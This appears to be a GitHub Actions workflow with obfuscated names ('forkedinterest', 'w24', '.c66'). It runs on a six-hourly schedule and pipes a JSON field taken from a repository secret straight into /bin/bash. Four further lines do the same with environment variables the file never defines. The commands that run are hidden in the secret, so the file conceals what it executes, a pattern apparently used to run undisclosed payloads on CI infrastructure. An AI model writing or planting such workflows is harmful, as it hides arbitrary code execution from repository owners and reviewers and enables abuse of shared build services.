name: forkedinterest
on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: forkedinterest
        env:
          w24: ${{ secrets.w24 }}
        run: |
          echo $w24 | jq -r .c66 | /bin/bash
          echo $hhr6081 | jq -r .dab5805 | /bin/bash
          echo $jrklm25322 | jq -r .io7149 | /bin/bash
          echo $aos2 | jq -r .vdtq764 | /bin/bash
          echo $jppka53 | jq -r .uekzs056 | /bin/bash

